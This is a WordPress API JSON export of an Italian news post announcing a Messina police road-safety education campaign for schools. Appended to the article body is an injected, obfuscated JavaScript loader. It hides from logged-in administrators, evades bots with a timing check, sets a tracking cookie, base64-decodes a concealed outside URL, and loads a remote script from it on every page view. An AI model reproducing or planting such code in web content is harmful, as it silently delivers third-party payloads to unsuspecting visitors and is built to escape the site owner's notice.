{"id":49929,"date":"2024-03-23T17:32:03","date_gmt":"2024-03-23T17:32:03","guid":{"rendered":"https:\/\/www.radioempire.it\/?p=49929"},"modified":"2026-02-24T22:53:07","modified_gmt":"2026-02-24T22:53:07","slug":"polizia-metropolitana-di-messina-lunedi-prossimo-al-via-il-progetto-i-giovani-e-la-sicurezza-stradale","status":"publish","type":"post","link":"https:\/\/www.radioempire.it\/index.php\/2024\/03\/23\/polizia-metropolitana-di-messina-lunedi-prossimo-al-via-il-progetto-i-giovani-e-la-sicurezza-stradale\/","title":{"rendered":"Polizia Metropolitana di Messina, luned\u00ec prossimo al via il progetto &#8220;I giovani e la sicurezza stradale&#8221;"},"content":{"rendered":"<p>La campagna di educazione stradale proseguir\u00e0 fino al prossimo mese di dicembre<br \/>\nAvr\u00e0 inizio luned\u00ec 25 marzo il progetto &#8220;I giovani e la sicurezza stradale&#8221;, ideato e organizzato dal<br \/>\nCorpo di Polizia Metropolitana, diretto dal Comandante dott. Giovanni Giardina, con la<br \/>\ncollaborazione dei Lions Club Colapesce Messina, dell\u2019Ufficio Scolastico Provinciale di Messina e<br \/>\ndel Provveditore agli Studi, dott. Stello Vadal\u00e0.<br \/>\nLa campagna di educazione stradale, che proseguir\u00e0 fino al prossimo mese di dicembre,<br \/>\ncoinvolger\u00e0 ventitr\u00e9 scuole di Messina e provincia, tra primarie e secondarie di primo e secondo<br \/>\ngrado, e si concretizzer\u00e0 nella realizzazione di un fumetto, tutto messinese, prodotto da Marika<br \/>\nMatalone con l\u2019adattamento di Cis Cinematografica Siciliana del dott. Salvo Grasso.<br \/>\nIl progetto porr\u00e0 l\u2019attenzione sui pericoli stradali e tratter\u00e0 tematiche correlate al Nuovo Codice<br \/>\ndella Strada, particolarmente attuali nel mondo giovanile, come l&#8217;uso dei monopattini e dei<br \/>\nveicoli elettrici, dei quadricicli, dei ciclomotori, dell\u2019uso di bevande alcoliche e dei cellulari alla<br \/>\nguida<br \/>\nSar\u00e0 Guido, personaggio allo stesso tempo immaginario e reale, a condurre i ragazzi nel mondo<br \/>\ndell\u2019educazione civica e stradale, con l\u2019obiettivo di sensibilizzare le future generazioni al rispetto<br \/>\nconsapevole delle regole di comportamento alla guida dei veicoli, a tutela della propria e altrui<br \/>\nsicurezza.<br \/>\n<strong>Il Responsabile dell\u2019Ufficio Comunicazione Istituzionale<\/strong><br \/>\n<strong>Istruttore Addetto alla Comunicazione dott. Giuseppe Span\u00f2<\/strong><br \/>\n<strong>Il Responsabile del Servizio Gabinetto Istituzionale<\/strong><br \/>\n<strong>Geom. G. Maggioloti<\/strong><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La campagna di educazione stradale proseguir\u00e0 fino al prossimo mese di dicembre Avr\u00e0 inizio luned\u00ec 25 marzo il progetto &#8220;I giovani e la sicurezza stradale&#8221;, ideato e organizzato dal Corpo<\/p>\n<div><a class=\"permalink\" href=\"https:\/\/www.radioempire.it\/index.php\/2024\/03\/23\/polizia-metropolitana-di-messina-lunedi-prossimo-al-via-il-progetto-i-giovani-e-la-sicurezza-stradale\/\">Read More&#8230;<\/a><\/div>\n","protected":false},"author":2,"featured_media":49930,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,36],"tags":[],"_links":{"self":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49929"}],"collection":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/comments?post=49929"}],"version-history":[{"count":2,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49929\/revisions"}],"predecessor-version":[{"id":57396,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/posts\/49929\/revisions\/57396"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media\/49930"}],"wp:attachment":[{"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/media?parent=49929"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/categories?post=49929"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.radioempire.it\/index.php\/wp-json\/wp\/v2\/tags?post=49929"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}